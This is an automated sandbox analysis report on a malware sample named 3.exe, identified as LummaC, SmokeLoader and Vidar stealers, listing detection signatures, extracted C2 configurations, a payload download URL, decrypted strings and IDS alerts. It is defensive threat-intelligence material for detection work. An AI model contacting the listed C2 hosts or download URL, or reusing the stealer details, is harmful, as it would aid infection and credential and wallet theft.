Windows Analysis Report
3.exe

Overview

General Information

Sample name: 3.exe
Analysis ID: 1447653
MD5: eda6e5a44657001108351760d2425c80
SHA1: bff6e0250b689d1431e72f8cf070d115ba4720f9
SHA256: 7728eb47da1cbc7e34e79df27d3e9f47f0d5054baf0c9bfa3bb44ebafa9a6d6f
Tags: exe
Infos:

Detection

LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected CryptOne packer
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected SmokeLoader
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Opens network shares
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
SmokeLoader The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
 https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: 3.exe Avira: detected
Antivirus detection for URL or domain
Source: whispedwoodmoodsksl.shop Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/( Avira URL Cloud: Label: malware
Source: http://45.129.96.86/file/update.exe Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/_o5e Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/r Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/%% Avira URL Cloud: Label: malware
Source: holicisticscrarws.shop Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\rcjjrra Avira: detection malicious, Label: HEUR/AGEN.1311176
Source: C:\Users\user\AppData\Local\Temp\A247.exe Avira: detection malicious, Label: TR/AVI.AceCrypter.javlp
Found malware configuration
Source: 00000008.00000002.2673984496.0000000002590000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "42d0618304a88d6476bc55d33c23d7e6", "Version": "9.8"}
Source: 00000004.00000002.2319406747.0000000002E30000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php", "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php"]}
Source: 5.3.A247.exe.7a0000.0.unpack Malware Configuration Extractor: LummaC {"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop"], "Build id": "swg5EG--"}
Multi AV Scanner detection for domain / URL
Source: whispedwoodmoodsksl.shop Virustotal: Detection: 17% Perma Link
Source: dbfhns.in Virustotal: Detection: 5% Perma Link
Source: whispedwoodmoodsksl.shop Virustotal: Detection: 17% Perma Link
Source: https://whispedwoodmoodsksl.shop/( Virustotal: Detection: 15% Perma Link
Source: https://65.109.242.59/s Virustotal: Detection: 13% Perma Link
Source: http://guteyr.cc/tmp/index.php Virustotal: Detection: 12% Perma Link
Source: https://65.109.242.59/r Virustotal: Detection: 6% Perma Link
Source: https://65.109.242.59/K Virustotal: Detection: 6% Perma Link
Source: http://45.129.96.86/file/update.exe Virustotal: Detection: 20% Perma Link
Source: https://65.109.242.59/O Virustotal: Detection: 6% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\A247.exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Roaming\rcjjrra ReversingLabs: Detection: 36%
Multi AV Scanner detection for submitted file
Source: 3.exe Virustotal: Detection: 47% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\rcjjrra Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A247.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5358.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: 3.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: boredimperissvieos.shop
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: holicisticscrarws.shop
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: sweetsquarediaslw.shop
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: plaintediousidowsko.shop
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: miniaturefinerninewjs.shop
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: zippyfinickysofwps.shop
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: obsceneclassyjuwks.shop
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: acceptabledcooeprs.shop
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: whispedwoodmoodsksl.shop
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp String decryptor: swg5EG--
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0041537E CryptUnprotectData, 5_2_0041537E
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCEA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 9_2_6CCEA9A0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCE44C0 PK11_PubEncrypt, 9_2_6CCE44C0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCE4440 PK11_PrivDecrypt, 9_2_6CCE4440
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCB4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 9_2_6CCB4420
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD325B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 9_2_6CD325B0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCCE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 9_2_6CCCE6E0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCEA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 9_2_6CCEA650
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCC8670 PK11_ExportEncryptedPrivKeyInfo, 9_2_6CCC8670
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD0A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 9_2_6CD0A730
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD10180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util, 9_2_6CD10180
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCE43B0 PK11_PubEncryptPKCS1,PR_SetError, 9_2_6CCE43B0

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\A247.exe Unpacked PE file: 5.2.A247.exe.400000.0.unpack
Uses 32bit PE files
Source: 3.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\3.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.67.133.187:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49738 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: kat2225.tmp, 00000009.00000002.3206547696.000000006F8FD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
Source: Binary string: freebl3.pdb source: freebl3.dll.9.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.9.dr
Source: Binary string: nss3.pdb@ source: kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.9.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.9.dr, vcruntime140.dll.9.dr
Source: Binary string: nss3.pdb source: kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr
Source: Binary string: mozglue.pdb source: kat2225.tmp, 00000009.00000002.3206547696.000000006F8FD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.9.dr
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esi+00000910h] 5_2_00427353
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esi+00000080h] 5_2_00427353
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov word ptr [eax], cx 5_2_004168EF
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esp+10h] 5_2_00409960
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esp+10h] 5_2_00409960
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h] 5_2_00404970
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esp+00000084h] 5_2_00415FE1
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then dec edx 5_2_0043B050
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 5_2_00417062
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esi+04h] 5_2_00417062
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 5_2_00426174
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esp+54h] 5_2_004381BB
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 5_2_00426271
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 5_2_00426284
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esp+000001E0h] 5_2_004102B2
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 5_2_004164D2
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, 00008000h 5_2_00403570
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then cmp cl, 0000002Eh 5_2_00421580
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 5_2_004025A0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then cmp byte ptr [ebp+00h], 00000000h 5_2_00414660
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov edi, ebx 5_2_00436670
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 5_2_00431680
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esp+000000C0h] 5_2_004106B1
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov dword ptr [esp+000005F0h], 00000000h 5_2_004138D2
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 5_2_004248E0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esi+30h] 5_2_00423931
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esi+30h] 5_2_00423AD0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then jmp edx 5_2_00422AFB
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esp+4Ch] 5_2_00415AFA
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then movsx eax, byte ptr [esi+ecx] 5_2_0040CB10
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esp+000001E0h] 5_2_0040FBB4
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then jmp edx 5_2_0041CCD0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 5_2_00425CEE
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov edx, dword ptr [esi+10h] 5_2_00423C97
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esi+08h] 5_2_00433D0A
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then movzx esi, word ptr [ecx] 5_2_00438F15
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then jmp edx 5_2_0062D097
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then movzx esi, word ptr [ecx] 5_2_0064917C
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esp+00000084h] 5_2_00626248
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then cmp cl, 0000002Eh 5_2_006312E0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 5_2_006272C9
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esi+04h] 5_2_006272C9
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then dec edx 5_2_0064B2B7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 5_2_006363DB
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 5_2_006364EB
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 5_2_006364D8
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esp+000001E0h] 5_2_00620519
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esi+00000910h] 5_2_006375BA
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esi+00000080h] 5_2_006375BA
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 5_2_00626739
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, 00008000h 5_2_006137D7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 5_2_00612807
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 5_2_006418E7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then cmp byte ptr [ebp+00h], 00000000h 5_2_006248C7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov edi, ebx 5_2_006468D7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esp+000000C0h] 5_2_00620918
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 5_2_00634B47
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov word ptr [eax], cx 5_2_00626B56
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esp+10h] 5_2_00619BC7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esp+10h] 5_2_00619BC7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 5_2_00634B47
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h] 5_2_00614BD7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esi+30h] 5_2_00633B98
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esp+000000A0h] 5_2_00631C89
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esp+4Ch] 5_2_00625D61
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then movsx eax, byte ptr [esi+ecx] 5_2_0061CD77
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then jmp edx 5_2_00632D5B
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esi+08h] 5_2_00643E13
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esp+000001E0h] 5_2_0061FE1B
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov edx, dword ptr [esi+10h] 5_2_00633EFE
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov edx, dword ptr [esi+10h] 5_2_00633ECF
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 5_2_00635F55
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then jmp dword ptr [004421CCh] 5_2_0062CF1A

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49711 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49712 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49713 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49714 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49715 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49716 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49718 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2052787 ET TROJAN DNS Query to Lumma Stealer Domain (whispedwoodmoodsksl .shop) 192.168.2.5:63577 -> 1.1.1.1:53
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49720 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49722 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49723 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49731 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49732 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49734 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49772 -> 190.187.52.42:80
